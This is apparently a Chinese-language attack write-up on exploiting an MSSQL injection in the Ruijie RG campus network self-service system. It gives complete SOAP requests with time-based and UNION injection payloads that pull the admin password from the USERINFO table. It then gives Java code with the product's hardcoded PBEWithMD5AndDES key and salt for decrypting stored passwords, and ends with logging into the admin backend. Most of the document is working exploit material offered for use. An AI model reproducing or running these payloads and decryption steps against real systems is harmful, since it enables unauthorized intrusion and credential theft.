前言 最近在打攻防,在内网遇到了锐捷RG 校园网自助服务系统,搜了一下发现有一个MSSQL注入,通过这个注入,拿到了这台服务器的权限。因此记录一下利用方式。
漏洞利用 首先这个系统是分两个端的
系统
应用
说明
校园网自助服务系统
selfservice
给学生用的
sam + 认证计费管理平台
sam
给管理员用的
SQL注入 直接微信一搜索就能找到payload
延时注入 互联网流传的payload是延时的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 POST /selfservice/service/operatorReportorRoamService HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Connection: close Content-Type: text/xml;charset=UTF-8 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.webservice.common.spl.ruijie.com"> <soapenv:Header/> <soapenv:Body> <ser:queryOperatorUuid> <!--type: string--> <ser:in0>';WAITFOR DELAY '0:0:5'--</ser:in0> </ser:queryOperatorUuid> </soapenv:Body> </soapenv:Envelope>
联合查询 因此改造一下payload、使用用联合查询直接读管理员密码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 POST /selfservice/service/operatorReportorRoamService HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Connection: close Content-Type: text/xml;charset=UTF-8 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.webservice.common.spl.ruijie.com"> <soapenv:Header/> <soapenv:Body> <ser:queryOperatorUuid> <!--type: string--> <ser:in0>' UNION ALL SELECT ISNULL(CAST(PASSWORD AS VARCHAR(4000)),CHAR(32)) FROM USERINFO WHERE USER_ID = CHAR(97)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110)--</ser:in0> </ser:queryOperatorUuid> </soapenv:Body> </soapenv:Envelope>
密码解密 拿到密码后丢cmd5,查不出来。
咋办呢?直接分析源码就好了。
怎么去定位到改密码的加解密算法呢?
很简单,关注登录、找回密码、重置密码等业务功能点的代码就行了。
最终扣出以下的java代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 import com.sun.crypto.provider.SunJCE; import javax.crypto.Cipher; import javax.crypto.SecretKey; import javax.crypto.SecretKeyFactory; import javax.crypto.spec.PBEKeySpec; import javax.crypto.spec.PBEParameterSpec; import java.security.Provider; import java.security.Security; /** * @Author jdr * @Date 2024-5-18 17:45 * @version 1.0 * @注释 */ public class main { private static final long serialVersionUID = 7969285134317283537L; private static char[] samKey = new char[]{'1', '2'}; protected static int encryptType = 1; private static Cipher encryptPbeCipher = null; private static Cipher decryptPbeCipher = null; public main() { } public static void init() { encryptPbeCipher = null; decryptPbeCipher = null; initJce(); } public static void initJce() { try { Security.addProvider(new SunJCE()); byte[] salt = new byte[]{-57, 115, 33, -116, 126, -56, -18, -103}; Provider wsProvider = Security.getProvider("BC"); if (wsProvider != null) { Security.removeProvider("BC"); } if (wsProvider != null) { Security.addProvider(wsProvider); } PBEParameterSpec pbeParamSpec = new PBEParameterSpec(salt, 20); SecretKeyFactory keyFac = SecretKeyFactory.getInstance("PBEWithMD5AndDES"); SecretKey pbeKey = keyFac.generateSecret(new PBEKeySpec(samKey)); encryptPbeCipher = Cipher.getInstance("PBEWithMD5AndDES"); decryptPbeCipher = Cipher.getInstance("PBEWithMD5AndDES"); encryptPbeCipher.init(1, pbeKey, pbeParamSpec); decryptPbeCipher.init(2, pbeKey, pbeParamSpec); } catch (Exception var5) { System.out.println(var5); } } public static synchronized byte[] encrypt(byte[] code) { try { if (encryptType == 1) { return encryptPbeCipher.doFinal(code); } else if (encryptType == 2) { return code; } else { System.out.println("密码类型时出错, encryptType=" + encryptType + "!"); return code; } } catch (Exception var4) { System.out.println(var4); try { init(); if (encryptType == 1) { return encryptPbeCipher.doFinal(code); } else if (encryptType == 2) { return code; } else { System.out.println("密码类型时出错, encryptType=" + encryptType + "!"); return code; } } catch (Exception var3) { System.out.println(var3); return code; } } } public static synchronized byte[] decrypt(byte[] encode) { try { if (encryptType == 1) { return decryptPbeCipher.doFinal(encode); } else if (encryptType == 2) { return encode; } else { System.out.println("密码类型时出错, encryptType=" + encryptType + "!"); return encode; } } catch (Exception var4) { System.out.println(var4); try { init(); if (encryptType == 1) { return decryptPbeCipher.doFinal(encode); } else if (encryptType == 2) { return encode; } else { System.out.println("密码类型时出错, encryptType=" + encryptType + "!"); return encode; } } catch (Exception var3) { System.out.println(var3); return encode; } } } public static synchronized String encrypt(String code) { if (encryptType == 1) { return bytesToHexString(encrypt(code.getBytes())); } else if (encryptType == 2) { return code; } else { System.out.println("密码类型时出错, encryptType=" + encryptType + "!"); return code; } } public static synchronized String decrypt(String encode) { if (encryptType == 1) { return new String(decrypt(hexStringToBytes(encode))); } else if (encryptType == 2) { return encode; } else { System.out.println("密码类型时出错, encryptType=" + encryptType + "!"); return encode; } } public static String bytesToHexString(byte[] ba) { return bytesToHexString(ba, ""); } public static String bytesToHexString(byte[] ba, String prefix) { if (ba != null && prefix != null) { StringBuffer sb = new StringBuffer(); sb.append(prefix); for(int i = 0; i < ba.length; ++i) { int vi = ba[i]; if (vi < 0) { vi += 256; } if (vi < 16) { sb.append("0"); } sb.append(Integer.toHexString(vi)); } return sb.toString(); } else { throw new NullPointerException(); } } public static byte[] hexStringToBytes(String hexStr) { return hexStringToBytes(hexStr, ""); } public static byte[] hexStringToBytes(String hexStr, String prefix) { if (hexStr != null && prefix != null) { String myHexStr = hexStr.trim(); if (myHexStr.startsWith(prefix)) { myHexStr = myHexStr.substring(prefix.length()); } int myHexStrLen = myHexStr.length(); byte[] ba = new byte[myHexStrLen / 2]; for(int i = 0; i < myHexStrLen; i += 2) { int vi = Integer.parseInt(myHexStr.substring(i, i + 2), 16); if (vi > 128) { vi -= 256; } ba[i / 2] = (byte)vi; } return ba; } else { throw new NullPointerException(); } } public static void main(String[] args) { System.out.println("密码是:"+decrypt("68a9d05959330e4e")); System.out.println(encrypt("123456")); } static { initJce(); } }
再利用解密后的密码就能登录sam的后台了。
